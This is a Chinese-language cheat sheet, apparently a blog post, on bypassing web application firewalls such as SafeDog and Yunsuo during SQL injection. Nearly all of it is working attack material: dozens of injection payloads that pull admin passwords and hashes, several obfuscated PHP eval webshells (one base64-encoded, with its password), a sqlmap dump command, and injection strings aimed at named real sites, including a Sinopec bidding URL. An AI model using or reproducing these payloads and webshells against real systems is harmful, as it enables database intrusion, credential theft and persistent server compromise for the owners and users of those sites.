### 简单的waf绕过
当我们注入的时候,发现有狗,有waf,真的是我的小心脏都碎掉了!!但是呢,很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。手工测试测试吧!!
#### 0x01,测试:
1,id=1空格 测试空格
2,id=1%201=1 测试等号
3,id=1%201=1 select 测试select
4,id=1%201=1 union select 测试union
5,id=1%201=1 union * select from 测试from
#### 0x02,简单绕过and or :
select.1.+1.+++.1.from
and 1=1 添加` xor 1=1
and 1=1 添加` xor 1=2
and%27%cf%27=%27%cf%27
#### 0x03,过狗的一句话 :
[一句话]()
<?php
$data = $_POST['cmd'];
eval($data);
?>
[一句话]()
<?php
$mysql="a"."s"."s"."e"."r"." "."t";
$mysql1=str_replace(" ","","$mysql");
$mysql1=($_POST[sec]);
?>
[一句话]()
<?php
$qelr="JGM9J2NvdW50JzskYTys0kXys0NPT0tJRTtpZihyZXNldCgyskysYSk9PSdjYycgysJiysYgysJG";
$tiww="JlyscGxhY2UoYXJyysYXkoJy9bXlx3PVysxzXS8nLCcvXHMvJyksysIGFysycmF5ysKCcnLCcrJyysksI";
$ywhw = str_replace("ed","","edsedtedr_edredepedledacede");
$btmo="GpvaW4oYXJyYXlfc2xpY2ysUoJysGEsJGMoJGEpLTMpKSkyspKTtlY2hvICc8ysLycuJGsuysJz4nO3ys0=";
$rwux="MoJGEpPjMpeyRrPSdhdic7ZWNobyAnPCcuJGsuJz4ysnO2V2ysYWwoYmFzZTY0Xys2RlY29kZShwyscysmVnX3";
$ylqo = $ywhw("q", "", "bqasqeq6q4_qdqecoqde");
$kqly = $ywhw("p","","cprpeatpep_pfupnpcptiopn");
$hyiw = $kqly('', $ylqo($ywhw("ys", "", $qelr.$rwux.$tiww.$btmo))); $hyiw();
#密码:ccav
?>
[一句话]()
<?php
$item['ad'] = '$_G';
$t['a'] = "ET['func']";
$a = $item['ad'].$t['a'];
$c['a'] = '$_G';
$c['b'] = "ET['url']";
$c = $c['a'].$c['b'];
$items['ad'] = 'co';
$ts['a'] = "py($c,$a);";
$b = $items['ad'].$ts['a'];
@eval($b);
?>
#### 0x04,过狗,waf的一些奇葩姿势 :
* burp抓包,修改:filename=webshell.(空格)php
* GET /index.php?id=1 and 1=1 改成:POST /index.php?id=1 and 1=1
#### 0x05,比较旧的过狗,waf的姿势 :
/*| -- |*/
/*!50XXX*/
/*!*/
and使用a%n%d来替换
空格使用/**/来替换
from打乱,就是类似f%u0072om
常用的:
id=1/*!50001union/*!*//*50000select/*!*/1,2,3
id=-1 union%23%0aall select 1,2,3
id=1%00' union select 1,2,3 from user --a
id=1 union%23%0aall select 2,username,3/*%00*//*!50001from*/user
id=100 union/*&id=*/--+-%0aall select/*&id=*/1,password,2 as [/*] from [admin] --a*/
id=100 union/*,*/--+-%0aall select/*,*/1,password,2 as [/*] from [admin] --a*/
id-100/*!50000union/*!*//*!50000select/*!*/1,2,3,4,current_user,6,7,8,9,10,11,12,13,14,15,16,17
以上的这些提交的方式都可以GET,POST尝试提交绕过。
#### 0x06,基本的过waf,狗的方法:
[0,简单绕过and or]()
select.1.+1.+++.1.from
and 1=1 添加` xor 1=1
and 1=1 添加` xor 1=2
and%27%cf%27=%27%cf%27
and`id` = 4 没有空格and后面,爆字段
uNiOn ( select 1,SCHEMA(),3,4,5,6,7,md5('admin') )
[1,大小写]()
AnD 1=1
SelEct uNION 1,2,3. fROm admin
[2,sql注释]()
mysql种注释方法有一下几种:
1./**/ 注释内部内容,常用
2. -- 注释就是一行,不常用
3.# 注释后面全部,不常用
还有//,+--+ ,--+, -- -, ;%00
我们简单的分析下:
/*!*/一个嵌套这个是,!是非的意思,就是说不屏蔽这个字符!and =不屏蔽and使and继续执行
/*!/*!*/双重嵌套,我说了!是非的意思,这句代码不是傻逼都可以看出来了
/*!1=2/**/*/这个是1<>2然后后面的/**/没卵用,但是把这个删除就绕过不了了,最后的*/是闭合前面的/*
当然还有其他的姿势:
127.0.0.1/sql.php?id=7/**/and/**/1=1
127.0.0.1/sql.php?id=7/*?--?*/and/**/1=1
127.0.0.1/sql.php?id=7/*%20--%20*/and/**/1=1
127.0.0.1/sql.php?id=7/*|%20--%20|*/and/**/1=1
结合前面两种方法:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….
[3,使用url编码]()
?id=1 union select pass from admin limit 1
?id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%31
[4,Unicode编码]()
'e' => '%u0065', //这是他的Unicode 编码
?id=1 union select pass from admin limit 1
?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1
[5,空字节]()
id=1%00' union select 1,2,3 from user --a
[6,嵌套]()
id=1 UNunionion all SESELECTECT from admin
[7,截断]()
id=1%00' union select 1,2,3 from user --a
[8,避开过滤器]()
[9,Http参数污染(HPP)]()
id=1137 union select 1&id=2&id=3&id=4&id=5&id=6&id=7&id=8&id=9&id=10&id=11&id=12&id=13&id=14&id=15&id=16&id=17&id=18&id=19&id=20&id=21&id=22
id=1137 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22
[10,使用逻辑运算符 or /and绕过]()
?id=1+OR+0x50=0x50
?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
第二句话,从最里面的括号开始分析,select+pwd+from+users+limit+1,1 这句是从users表里查询pwd字段的第一条记录,
比如是admin,然后mid(上一句),1,1就是取admin的第一个字符,也就是a,
lower(上一句)就是把字符转换为小写,然后ascii就是把a转换成ascii码,看等不等于74。
[11,%0A换行污染绕过]()
id=-1 union%23%0aselect 1,2,3
id=1 union%23%0aall select 2,username,3/*%00*//*!50001from*/user
[12,复参数绕过]()
?id=1 union select+1,2,3+from+users+where+id=1--
?id=1 union select+1&id=2,3+from+users+where+id=1--
?id=1&id=1 union select+1,2,3+from+users+where+id=1--
[13,数据库特性绕过]()
?id=1 union select.1.+1.+++.1.from
[14,盲注无需or和and]()
?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)+123
123的时候页面是正确的,我们现在在盲猜hash的第一位,如果第一位等于0x42也就是B,
那么strcmp结果为0,0+123=123,所以页面应该是正确的。否则就说明不是B,就这样猜,不用and和or了。
[15,用(),其中,""用于表和列,"()"用于数值也可以做分隔.]()
http://www.waitalone.cn/shownews.asp?id=%28-575%29UNION%20SE%LECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18%20from[admin]
[16,冷门函数/标签绕过]()
id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))
id=1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
[17,内部注释]()
http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…
U替换为%55,S替换为%53 在 union 和 select 之间添加注释/**/
id=1/*!UnIoN*/SeLeCT
#### 0x06,高级的过waf,狗的方法
[1、缓冲区溢出/使防火墙崩溃]()
大部分防火墙都是基于C/C++开发的,我们可以使用缓冲区溢出使用WAF崩溃
http://www.site.com/index.php?page_id=-15+and+(select1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….
你可以使用如下方法测试WAF
?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….
如果返回500错误,你就可以使用缓冲区溢出的方法来绕过WAF
[2、对字母进行编码]()
http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….
[3、使用其他变量或者命令对注入语句进行替换]()
COMMAND | WHAT TO USE INSTEAD
@@version | version()
concat() | concat_ws()
group_concat() | concat_ws()
[4、利用WAF本身的功能绕过]()
假如你发现WAF会把"*"替换为空,那么你就可以利用这一特性来进行绕过
http://www.example.com/index.php?page=-15+uni*on+sel*ect+1,2,3,4..
其它方法:
-15+(uNioN)+(sElECt)….
-15+(uNioN+SeleCT)+…
-15+(UnI)(oN)+(SeL)(ecT)+….
-15+union (select 1,2,3,4…)
除此之外还有:
http://ebidding.sinopec.com:8880/TPWeb4AAA/Showinfo/SearchResult.aspx?&searchtype=title&keyword=1' exec('selec'%2b't convert(int,(@@version))')select name orderNum,name InfoDate,name PubInWebDate from[sysobjects]where'1'='
#### 0x07,一些比较常见的waf
[智创防火墙]()
sqlmap.py -u http://www.xx.com/shangmao/artmore.asp --cookie "id=48514" --level 2 -D database() -T tables() -C "adminname,adminpass" --dump --threads=10 --tamper=charunicodeencode.py -v 2
[全方位绕过云锁]()
http://127.0.0.1/sql.php?id=1/*!/*!and*//*!1=2/**/*/
http://127.0.0.1/sql.php?id=7/*|%20--%20|*/and/**/1=1
[绕过护卫盾]()
小马
<title>login</title>nono<?php eval($_POST[1])?>
<?php $a = str_replace(x,”",”axsxxsxexrxxt”); $a($_POST["c"]); ?>
#### 0x08,一些系统平台的绕过
[针对disucz x内置_do_query_safe()的绕过]()
gid=1 and 1=2 union select 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user 拦截
gid=1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user 绕过disucz x2.0
gid=@`'` union select @`'`,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14 from mysql.user 绕过disucz x2.5
gid=`'` or @`''` union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a)b where @`'` 绕过
disucz x2.5 二次修补
[绕过某waf –by havij]()
/*!30000union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 10,1),null,null,null,null*/--
list.php?yw=bj&id=3&id=1 /*!30000union all select (select concat(0x27,uid,0x5e,username,0x5e,password,0x5e,email,0x5e,salt,0x27) from `gs_ucenter`.uc_members limit 0,1) ,null,null,null,null*/--
#### 0x09,一些过waf,狗实战
[实战一]()
newsid=60+a%nd%201=(se%lect%20@@VERSION)--
newsid=60+a%nd%201=(se%lect%20@@servername)--
newsid=60+a%nd 1=(se%lect name f%rom mas%ter.dbo.sysd%atabases wh%ere dbid=1)--
newsid=60+a%nd (se%lect t%o%p 1 name f%rom pedaohang.d%b%o.s%ys%obje%cts where xtype='U' a%nd name not in (se%lect top 1 name fr%om gpbctv.dbo.sysobjects wh%ere xtype='U'))>0--
newsid=60+a%nd (se%lect t%o%p 1 col_name(object_id('Art_Admin'),1) f%rom sysobjects)>0--
newsid=60+a%nd (se%lect t%o%p 1 pass fr%om Art_Admin where pass not in (se%lect t%o%p 1 pass fr%om Art_Admin))>0--
以后会继续补充,谢谢!!